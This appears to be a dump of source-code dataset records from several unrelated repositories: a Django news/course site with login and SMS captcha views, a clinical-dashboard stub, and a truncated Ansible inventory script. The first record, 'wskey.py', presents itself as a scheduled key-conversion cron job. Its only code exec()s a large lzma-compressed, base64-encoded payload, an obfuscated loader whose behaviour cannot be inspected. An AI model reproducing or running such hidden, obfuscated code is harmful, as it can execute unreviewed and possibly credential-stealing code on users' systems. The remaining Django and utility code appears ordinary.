"blob_id": "20b121b42aea1daaeea02893199e4c90f212da12",
"content_id": "7974c9892cc651639d39bd1c867bc62662f2f902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/wskey.py",
"repo_name": "gjh000777/wskey",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*\n'''\ncron: 15 */6 * * * wskey.py\nnew Env('wskey转换');\n'''\n\n\nimport base64\nimport lzma\n\nexec(lzma.decompress(base64.b64decode('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')))\n"
}
] | 1 |
CoopG/clinical-data-dashboard | https://github.com/CoopG/clinical-data-dashboard | 7b83a4621a7ea20cde661d95e41604b3b5f2e320 | bac14448015d355faeb880b757a1b19b83ac853e | 6bee7f0b5170c594e3f15f37a9cefdd576947848 | refs/heads/master | 2020-04-07T14:34:58.049459 | 2018-11-20T21:54:45 | 2018-11-20T21:54:45 | 158,452,947 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7283950448036194,
"alphanum_fraction": 0.7283950448036194,
"avg_line_length": 15.199999809265137,
"blob_id": "e0432a34ce6ad906864a2eea0aac3271045b3319",
"content_id": "37d60ed47705ad55dffb0018d84f3d0965cd0c97",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 81,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 5,
"path": "/cdd/apps.py",
"repo_name": "CoopG/clinical-data-dashboard",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass CddConfig(AppConfig):\n name = 'cdd'\n"
},
{
"alpha_fraction": 0.8399999737739563,
"alphanum_fraction": 0.8399999737739563,
"avg_line_length": 25,
"blob_id": "80c04359e48a09cb7ee4a805d37509541e59b508",
"content_id": "f620965d5d0518b479dee2a3ddc665ada9a64061",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 25,
"license_type": "permissive",
"max_line_length": 25,
"num_lines": 1,
"path": "/README.md",
"repo_name": "CoopG/clinical-data-dashboard",
"src_encoding": "UTF-8",
"text": "# clinical-data-dashboard"
}
] | 2 |
yktimes/yk_go | https://github.com/yktimes/yk_go | 94313f7a6fcbff3251788aac352320ec9ec83807 | 4f3b10694bbba5585b373de6a6e0f794b3d9ce2b | 1ff3a8eff7e162d2c86ebfa84c4d2fa70f2fa3a6 | refs/heads/master | 2022-12-13T23:46:29.092592 | 2019-08-05T07:16:20 | 2019-08-05T07:16:20 | 200,196,710 | 0 | 0 | null | 2019-08-02T08:27:25 | 2019-08-05T07:23:24 | 2022-12-04T05:44:49 | CSS | [
{
"alpha_fraction": 0.6917510628700256,
"alphanum_fraction": 0.6917510628700256,
"avg_line_length": 30.363636016845703,
"blob_id": "4b3a8904d1ac264b6b60912b32db4a1f68a5554b",
"content_id": "9c018189c46246491285035ccc81049fee2c0292",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 703,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 22,
"path": "/apps/cms/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\n\nfrom . import views\nfrom django.conf import settings\n\napp_name =\"cms\" # 应用命名空间\n\nurlpatterns = [\n path('', views.index,name='index'),\n path('write_news/', views.WriteNewView.as_view(),name='write_news'),\n path('news_category/', views.news_category,name='news_category'),\n\n path('add_news_category/',views.add_news_category,name='add_news_category'),\n\n path('edit_news_category/', views.edit_news_category, name='edit_news_category'),\n path('delete_news_category/', views.delete_news_category, name='delete_news_category'),\n\n\n path('upload_file/',views.upload_file,name='upload_file'),\n\n path('qntoken/', views.qntoken, name='qntoken')\n]\n"
},
{
"alpha_fraction": 0.6232091784477234,
"alphanum_fraction": 0.642192006111145,
"avg_line_length": 32.55421829223633,
"blob_id": "cbd53797bf01c358bc66358ed4c3273e58efd336",
"content_id": "f4881118fa72743ccd86bcd044af97a840089fc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3090,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 83,
"path": "/apps/ykauth/forms.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom apps.forms import FormMixin\nfrom .models import User\nfrom django_redis import get_redis_connection\nimport re\nfrom utils import restful\n\nclass LoginForm(forms.Form,FormMixin):\n telephone= forms.CharField(max_length=11)\n password = forms.CharField(max_length=20,min_length=6,error_messages={\n \"max_length\":\"密码最多不能超过20个字符\",\n \"min_length\":\"密码不能少于6个字符\"\n })\n remember = forms.IntegerField(required=False)\n\n\nclass RegisterForm(forms.Form,FormMixin):\n telephone = forms.CharField(max_length=11)\n username = forms.CharField(max_length=20)\n password1 = forms.CharField(max_length=20, min_length=6, error_messages={\n \"max_length\": \"密码最多不能超过20个字符\",\n \"min_length\": \"密码不能少于6个字符\"\n })\n password2 = forms.CharField(max_length=20, min_length=6, error_messages={\n \"max_length\": \"密码最多不能超过20个字符\",\n \"min_length\": \"密码不能少于6个字符\"\n })\n img_captcha = forms.CharField(min_length=4, max_length=4,error_messages={\n \"max_length\": \"只允许4个字符\",\n \"min_length\": \"只允许4个字符\"\n })\n sms_captcha = forms.CharField(min_length=6, max_length=6,error_messages={\n \"max_length\": \"只允许6个数字\",\n \"min_length\": \"只允许6个数字\"\n })\n\n\n def clean(self):\n cleaned_data = super(RegisterForm, self).clean()\n\n password1 = cleaned_data.get('password1')\n password2 = cleaned_data.get('password2')\n username = cleaned_data.get('username')\n telephone = cleaned_data.get('telephone')\n img_captcha = cleaned_data.get('img_captcha')\n sms_captcha = cleaned_data.get('sms_captcha')\n\n if not all([username,password2,password1,telephone,img_captcha,sms_captcha]):\n raise forms.ValidationError(\"参数不允许为空\")\n\n\n if not re.match(r'^1[3-9]\\d{9}$', telephone):\n\n raise forms.ValidationError('手机号格式错误')\n\n if password1 != password2:\n raise forms.ValidationError('两次密码输入不一致!')\n\n\n\n\n redis_conn = get_redis_connection('img_captcha')\n cached_img_captcha = redis_conn.get(img_captcha.lower())\n print(\"1111\",cached_img_captcha)\n print(111,cached_img_captcha)\n if not cached_img_captcha or cached_img_captcha.decode().lower() != img_captcha.lower():\n raise forms.ValidationError(\"图形验证码错误!\")\n\n exists = User.objects.filter(telephone=telephone).exists()\n if exists:\n raise forms.ValidationError('该手机号码已经被注册!')\n\n\n # 判断短信验证码\n redis_conn = get_redis_connection('verify_codes')\n\n real_sms_code = redis_conn.get('sms_%s' % telephone)\n if real_sms_code is None:\n raise forms.ValidationError('无效的短信验证码')\n if sms_captcha != real_sms_code.decode():\n raise forms.ValidationError('短信验证码错误')\n\n return cleaned_data\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7037887573242188,
"alphanum_fraction": 0.7210103273391724,
"avg_line_length": 25.393939971923828,
"blob_id": "c354ba76c37a600934301f32eff65eef1c11cb47",
"content_id": "c90122731344775e2b4dedfcbbe432569a9b127d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 33,
"path": "/utils/restful.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.http import JsonResponse\n\nclass HttpCode:\n ok=200\n paramserror = 400\n unauth=401\n methoderror=405\n servererror=500\n\ndef result(code=HttpCode.ok,message=\"\",data=None,kwargs=None):\n json_dict={\"code\":code,\"message\":message,\"data\":data}\n\n if kwargs and isinstance(kwargs,dict) and kwargs.keys():\n json_dict.update(kwargs)\n\n return JsonResponse(json_dict)\n\ndef ok():\n return result()\n\ndef params_error(message=\"\",data=None):\n return result(code=HttpCode.paramserror,message=message,data=data)\n\n\ndef unauth(message=\"\",data=None):\n return result(code=HttpCode.unauth, message=message, data=data)\n\ndef method_error(message=\"\",data=None):\n return result(code=HttpCode.methoderror, message=message, data=data)\n\n\ndef server_error(message=\"\",data=None):\n return result(code=HttpCode.servererror, message=message, data=data)\n"
},
{
"alpha_fraction": 0.6881720423698425,
"alphanum_fraction": 0.6881720423698425,
"avg_line_length": 33.875,
"blob_id": "bdb768dabe9c8f89580b9b49175c4b0bdb9aa3d4",
"content_id": "a29da0b41f25c187e066732734f9b841aeca7616",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 558,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 16,
"path": "/yk_go/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.urls import path,include\nfrom apps.news import views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nurlpatterns = [\n path('', views.index,name=\"index\"),\n\n path('cms/', include(\"apps.cms.urls\")),\n path('account/', include(\"apps.ykauth.urls\")),\n\n path('news/', include(\"apps.news.urls\")),\n path('course/', include(\"apps.course.urls\")),\n path('payinfo/', include(\"apps.payinfo.urls\")),\n path('ueditor/',include('apps.ueditor.urls'))\n\n]+static(settings.MEDIA_URL,document_root = settings.MEDIA_ROOT)\n"
},
{
"alpha_fraction": 0.6689655184745789,
"alphanum_fraction": 0.6689655184745789,
"avg_line_length": 13.399999618530273,
"blob_id": "ac28dc1c3a87a776a9db2cdf59005fcc095b4c65",
"content_id": "1bb3b714f4165a049a2a83d9eb59947265a655fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/apps/payinfo/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\nfrom . import views\n\napp_name =\"payinfo\" # 应用命名空间\n\nurlpatterns = [\n\n path('', views.payinfo,name='payinfo'),\n\n]\n"
},
{
"alpha_fraction": 0.6603773832321167,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 20.100000381469727,
"blob_id": "a3048252591d6c6d391f9c19953b5a9c5c5fbf41",
"content_id": "6b72a69baecbcd393fa6e4eda9c5ee4bf5b4d051",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 224,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 10,
"path": "/apps/news/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\nfrom . import views\n\napp_name =\"news\" # 应用命名空间\n\nurlpatterns = [\n\n path('<int:news_id>/', views.news_detail,name='news_detail'),\n path('search/', views.search,name='search'),\n]\n"
},
{
"alpha_fraction": 0.6997971534729004,
"alphanum_fraction": 0.6997971534729004,
"avg_line_length": 19.58333396911621,
"blob_id": "783da3fbb6b06a3e204c6a7f0c60f1ce2ad7300c",
"content_id": "7b37890fd0ebb1f0d6c8edde4fbaef5581ef36a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 493,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 24,
"path": "/apps/news/views.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom .models import NewsCategory,News\n# Create your views here.\n\n\ndef index(request):\n\n newes = News.objects.all()\n categories = NewsCategory.objects.all()\n\n context={\n 'newes':newes,\n 'categories':categories\n }\n\n return render(request,\"news/index.html\",context=context)\n\n\ndef news_detail(request,news_id):\n return render(request,\"news/news_detail.html\")\n\n\ndef search(request):\n return render(request,\"search/search.html\")"
},
{
"alpha_fraction": 0.6322140693664551,
"alphanum_fraction": 0.6392969489097595,
"avg_line_length": 26.43165397644043,
"blob_id": "364d86c977342a26a3384d6ffe8bb6211e3bef76",
"content_id": "1af66806c3fe0f09b76c01bdfef9980f6c082fe7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4160,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 139,
"path": "/apps/ykauth/views.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import login,logout,authenticate\nfrom django.views.decorators.http import require_POST\nfrom .forms import LoginForm,RegisterForm\nfrom django.http import JsonResponse\nfrom utils import restful\nfrom django.shortcuts import redirect,reverse\nfrom utils.captcha.ykzcaptcha import Captcha\nfrom io import BytesIO\nfrom django.http.response import HttpResponse\n\nfrom django_redis import get_redis_connection\nfrom utils.aliyunsdk import aliyunsms\nimport re\nfrom . import constants\nfrom django.contrib.auth import get_user_model\nimport random\n\n\nUser = get_user_model()\n\n@require_POST\ndef login_view(request):\n form = LoginForm(request.POST)\n if form.is_valid():\n telephone = form.cleaned_data.get(\"telephone\")\n password = form.cleaned_data.get(\"password\")\n remember = form.cleaned_data.get(\"remember\")\n\n user = authenticate(request,username=telephone,password=password)\n\n if user:\n if user.is_active: # 正常用户\n login(request,user)\n if remember:\n request.session.set_expiry(None) # 默认使用2个星期\n else:\n request.session.set_expiry(0) # 退出浏览器清除session\n\n return restful.ok()\n\n else: # 说明该用户是黑名单用户\n\n return restful.unauth(message=\"您的账号被冻结,请联系管理员\")\n else:\n return restful.params_error(message=\"账号或密码错误\")\n\n else:\n errors = form.get_errors()\n print(\"login\",errors)\n return restful.params_error(message=errors)\n\n\ndef logout_view(request):\n logout(request)\n return redirect(reverse(\"index\"))\n\n@require_POST\ndef register(request):\n form = RegisterForm(request.POST)\n if form.is_valid():\n telephone = form.cleaned_data.get('telephone')\n username=form.cleaned_data.get('username')\n password = form.cleaned_data.get('password2')\n user = User.objects.create_user(\n telephone=telephone,\n username=username,\n password=password\n )\n print(user)\n login(request,user)\n\n return restful.ok()\n\n else:\n print(form.get_errors())\n return restful.params_error(message=form.get_errors())\n\n\n\ndef img_captcha(request):\n text,image = Captcha.gene_code()\n # BytesIO:相当于一个管道,用来存储图片的流数据\n out = BytesIO()\n # 调用image的save方法,将这个image对象保存到BytesIO中\n image.save(out,'png')\n # 将BytesIO的文件指针移动到最开始的位置\n out.seek(0)\n\n response = HttpResponse(content_type='image/png')\n # 从BytesIO的管道中,读取出图片数据,保存到response对象上\n response.write(out.read())\n response['Content-length'] = out.tell()\n\n # 12Df:12Df.lower()\n redis_conn = get_redis_connection('img_captcha')\n redis_conn.setex(text.lower(), constants.SMS_CODE_REDIS_EXPIRES,text.lower())\n\n\n return response\n\n\n\ndef sms_captcha(request):\n telephone = request.GET.get(\"telephone\")\n\n\n\n # ret = re.match(r\"^1[35678]\\d{9}$\", telephone)\n\n if telephone:\n\n # 保存短信验证码与发送记录\n redis_conn = get_redis_connection('verify_codes')\n # 判断图片验证码, 判断是否在60s内\n send_flag = redis_conn.get(\"send_flag_%s\" % telephone)\n if send_flag:\n return restful.params_error(message=\"请求次数过于频繁\")\n\n # 生成短信验证码\n sms_code = \"%06d\" % random.randint(0, 999999)\n\n pl = redis_conn.pipeline()\n pl.setex(\"sms_%s\" % telephone, constants.SMS_CODE_REDIS_EXPIRES, sms_code)\n pl.setex(\"send_flag_%s\" % telephone, constants.SEND_SMS_CODE_INTERVAL, 1)\n pl.execute()\n\n try:\n\n result = aliyunsms.send_sms(telephone,sms_code)\n print(result)\n\n return restful.ok()\n\n\n except Exception as e:\n return restful.params_error(message=\"网络错误\")\n\n else:\n return restful.params_error(message=\"请填写正确的手机号码\")"
},
{
"alpha_fraction": 0.681614339351654,
"alphanum_fraction": 0.681614339351654,
"avg_line_length": 23.66666603088379,
"blob_id": "eb81c5e4472d5eca99fe915b6c907e3910f350f5",
"content_id": "f79648eb6f00799e6de49952d841e709f6a1cac9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/apps/course/urls.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls import path\nfrom . import views\n\napp_name =\"course\" # 应用命名空间\n\nurlpatterns = [\n path('', views.course_index,name='course_index'),\n path('<int:course_id>', views.course_detail,name='course_detail'),\n]\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 15,
"blob_id": "b741201ed0bc4050161fa0d987583fee2857d17e",
"content_id": "9a0e3bfe8a4cb56ee1b30df318f3365a5949a65c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 135,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 6,
"path": "/apps/ykauth/constants.py",
"repo_name": "yktimes/yk_go",
"src_encoding": "UTF-8",
"text": "# redis中短信验证码有效时间: s\nSMS_CODE_REDIS_EXPIRES = 300\n\n\n# 发送短信时间间隔限制: s\nSEND_SMS_CODE_INTERVAL = 60"
}
] | 10 |
ecanuto/inventory.py | https://github.com/ecanuto/inventory.py | 188b4cde77f7fabd623ff2079f78e513e2e598ae | c1495e9556451e44697891a03c62ccdb916edcb0 | aacedc56e4b3fe695ba6fcfe38e622d20f47b4aa | refs/heads/master | 2021-01-04T23:53:07.921429 | 2020-02-16T00:25:00 | 2020-02-16T00:25:00 | 240,804,579 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5411807298660278,
"alphanum_fraction": 0.5455539226531982,
"avg_line_length": 27,
"blob_id": "776d0cb5909bd73d9e7f535b280533e7aaa6c8cb",
"content_id": "afc8ccb64f0d624dd922e8658f7b10ea26b688c2",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2744,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 98,
"path": "/inventory.py",
"repo_name": "ecanuto/inventory.py",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n#\n# 2020 February 15 - Everaldo Canuto\n#\n# I dedicate any and all copyright interest in this software to the\n# public domain. I make this dedication for the benefit of the public at\n# large and to the detriment of my heirs and successors. I intend this\n# dedication to be an overt act of relinquishment in perpetuity of all\n# present and future rights to this software under copyright law.\n#\n\n\nimport argparse\nimport pathlib\nimport json\nimport yaml\n\n\n__prgdesc__ = \"Simplified YAML Ansible inventory\"\n__version__ = \"0.1\"\n\n\nclass SimplifiedAnsibleInventory(object):\n\n def __init__(self):\n parser = argparse.ArgumentParser(description=__prgdesc__)\n\n parser.add_argument(\"-v\", \"--version\", action=\"version\",\n version=\"%(prog)s \" + __version__)\n\n parser.add_argument(\"-l\", \"--list\", action=\"store_true\",\n help=\"output inventory\")\n\n parser.add_argument(\"-H\", \"--host\", action=\"store\",\n help=\"output host vars\")\n\n args = parser.parse_args()\n\n self.parse_yaml()\n\n if args.list:\n self.output_list()\n\n if args.host:\n self.output_host(args.host)\n\n def print_json(self, data):\n print(json.dumps(data or {}, indent=4, sort_keys=False))\n\n def parse_yaml(self):\n self.groups = {}\n self.hosts = {}\n\n filename = pathlib.Path(__file__).stem + \".yml\"\n\n with open(filename) as file:\n data = yaml.load(file, Loader=yaml.FullLoader)\n\n for entry in data:\n if entry.get(\"name\"):\n self.groups[entry.get(\"name\")] = entry\n if entry.get(\"host\"):\n self.hosts[entry.get(\"host\")] = entry\n\n for name, host in self.hosts.items():\n tags = host.get(\"tags\") or 